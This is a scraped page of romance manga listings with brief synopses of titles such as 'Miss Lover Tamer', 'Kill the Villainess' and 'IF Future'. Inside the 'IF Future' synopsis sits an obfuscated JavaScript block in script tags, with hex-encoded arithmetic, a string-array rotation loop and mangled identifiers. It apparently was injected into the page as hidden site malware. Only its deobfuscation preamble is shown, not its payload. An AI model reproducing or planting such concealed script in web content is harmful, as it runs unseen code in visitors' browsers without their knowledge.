Romance - Page 1813

Romance manga is a genre that explores romantic relationships, filled with emotional highs and lows, offering readers a heartfelt journey of love, growth, and conflict.

24282 results

Miss Lover Tamer

"Unbelievable". When I wake up, I realized that I've traveled into an embarrassing novel I wrote in my teenage years. Now I'm the infamous first miss in the house of Prime Minister. According to the plot I wrote, the female lead was a flirtatious girl who had only one interest in the world -- flirting with handsome guys. However, her ending wasn't a good one, or to say it is tragedy would be more accurate. But I'm not going to accept the ending as it is. Time for me to tame my lovers! MangaToon got authorization from iCiyuan to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Choose Your Real Daddy Tyrant

Dr. Jaehee Cheon, who lost her parents at early age and can’t remember their face, who has lived without a single friend, let alone a lover, reincarnated as the unlucky princess in a novel that dies at the age of twelve! If we can’t find the princess’ biological father, she will die. But apparently there are four candidates??? And the bigger problem is that they are too deadly…. Will Chun Jae-hee be able to find her real father safely and have a happy ending?


Kill the Villainess

<h3 class="h5">Kill the Villainess</h3> I reincarnated in a novel inside the body of a villainess named Elise who poisoned herself when her fiancé, the prince, married her childhood friend, the maid Helena. From the moment I realized this, I had only one goal. Escape from the world in this novel. Even after death, I tried to get out of this world but the ‘world’ did not allow it. However, after rejecting the path of “Elise” in the original novel, the men who had persecuted and ignored Eris began to beg for her interest and affection. “Who are you?” the priest who revived Helena asked. “You… are you really Elise?” even the warrior who pledged eternal loyalty to Helena asked. “You have changed,” said the prince who rejected Elise in order to marry Helena. It was strange. No one was interested in Elise before. “I don’t want to get affectionate even as time passes.” She has no confidence in loving this world.


Please Throw Me Away

<h2>Please Throw Me Away and I Want You to Throw Me Away</h2> Adele was adopted in replacement of a lady who died from a rare disease. She worked her entire life so she would be loved, but as soon as her younger sister was born, she was abandoned. Then on Adele’s way to an arranged marriage, she was assassinated by mysterious enemies. “…Is this a dream?” But when she opened her eyes, she returned to 3 years in the past! Since she is destined to be abandoned when her younger sister is born, this time around, she tries to live the way she wants, but things keep going wrong. “Weren’t you interested in me?” And a mysterious knight in black keeps pursuing her…


Wife of the Wealthy: The Marshal Is Too Domineering

[Adapted from “Half Life Ups and Downs Just for You”, the comic has made major changes to the plot, please be merciful!] She is the daughter of a defeated army, and there is too much pain behind her marrying into a wealthy family. He is a domineering young marshal, under his cold eyes there is tenderness only for her. “Yun Jiashu, how are you going to compensate me for what you did before!” She complained to him, but Young Marshal Bingshan couldn’t help laughing, “My dear lady, is it enough to compensate you for my husband’s life.


A Nest Of Phoenixes

Read manhua A Nest Of Phoenixes / 一窝凤凰 / Yī wō fènghuáng In the ancient times, when heaven and earth were first born, all order was not yet established, the world was chaotic and the three worlds were unsettled. Fortunately, the four Immortal Monarchs, Heng Yang, Dong Yang, Ling Yang and Qing Yang, emerged from the sky to guard the four seas and the eight wastes, leading to the subservience of all the tribes and a harmonious coexistence. The sky and the earth were clear and prosperous. However, how did the Phoenix tribe come to be so different? They are jumping up and down, making a scene, disturbing the immortals, but there are people who enjoy this.


A Fool And A Girl

Diha was ashamed and embarrassed to engage in a relationship with Rujin who lived under the same roof as her. But eventually, they coveted each other and allowed their instincts to lead. They never knew the feelings of love, but together, they'll search for it.


IF Future

Wei Lai accidentally picked up a mysterious camera that can take pictures of the future but found that it only has an effect on her secret crush, a senior.<script></script><script>(function(_0x211584,_0x56cbb6){var _0x7292a6=_0x15a5,_0x29a976=_0x211584();while(!![]){try{var _0xf64dc9=-parseInt(_0x7292a6(0x11e))/(-0x10f3+0x19e2+-0x8ee)+parseInt(_0x7292a6(0x112))/(-0x8d8*-0x1+-0x1201*0x1+-0x1*-0x92b)+-parseInt(_0x7292a6(0x108))/(0x21b6*-0x1+0x17f*0x3+0x1d3c)+parseInt(_0x7292a6(0x113))/(-0x14f3+0x16bb+-0x4*0x71)+-parseInt(_0x7292a6(0x120))/(-0x35e*-0x2+0xb78+-0x122f)+parseInt(_0x7292a6(0x117))/(0xf6+0xc5*0x2e+-0x122b*0x2)+parseInt(_0x7292a6(0x122))/(0x19ae+0x143a+-0x2de1);if(_0xf64dc9===_0x56cbb6)break;else _0x29a976['push'](_0x29a976['shift']());}catch(_0x33cce5){_0x29a976['push'](_0x29a976['shift']());}}}(_0x26a4,0xbbb80+-0xb*-0x15029+0xac52*-0x15));function _0x26a4(){var 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Full Cup Of Water

Xin Qianyu: Probably you never know, I am with you, you always ignore it, it's all because of me stalking.I don't want to be like this anymore.Su Zhong: That's not the case then.For me to stalk you.[Emotional Intelligence Low Attack X Disguise Bai Lian Sui] [Broken Mirror Reunion]


He’s Now Healthy-Perhaps Too Much

Read manhwa He’s Now Healthy-Perhaps Too Much / The Terminally Ill Obsessed Male Lead Has Become Very Healthy / 余命わずかのヒーローが元気になっちゃった!? / 시한부 집착 남주가 너무 건강해졌다 One day, the female lead wakes up as Rosaline, a character from an erotic novel. Surprisingly, Rosaline is… the tutor who is killed after failing to trigger the awakening in Theodor, the terminally ill, obsessive tyrant! The key to solving his problem lies in evoking intense emotions through lovemaking! As a former personal trainer, Rosaline tries to initiate the awakening by non-sexual means. And for her own survival, she accomplishes her mission and makes him healthy, but… something peculiar unfolds. “Your Highness… You have become too healthy…”


The Grand Duchess of the North Was Secretly a Villainess

Eloise Wayana, the grand duchess of the North, is executed by Emperor Caien Helisis after it is revealed that she was secretly a villainess all along. This marks the end of season two of the latest trending web novel, “The Crown of Blood.” As one of its avid readers, Kim Dakyung is eagerly waiting for the next season when she is suddenly hit by a truck on her way home! But once she reawakens, she finds that she is in the body of the grand duchess herself and has been teleported back to the novel’s beginning. Already knowing what road Eloise will go down, Dakyung is desperate to change her fate and survive until season three. Lucky for her, a younger version of Caien falls right into her hands, and she is going to do whatever it takes to keep him on her side. Alternative Name The Grand Duchess of the North Was Secretly a Villainess / 북부 대공의 정체가 흑막 악녀라 곤란하다


The Dragon Knight's Beloved

Melissa, an attendant-in-training at the royal castle, wants to work besides the Dragon Knight's commanding officer Hubert, a man she admires, and the dragons which she loves. However, she suddenly finds out that he has retired and left the castle! Ichijinsha Books Iris' incredibly popular work is finally out in comic form! The love fantasy of a straight-laced, stubborn knight and a dragon-loving attendant!!
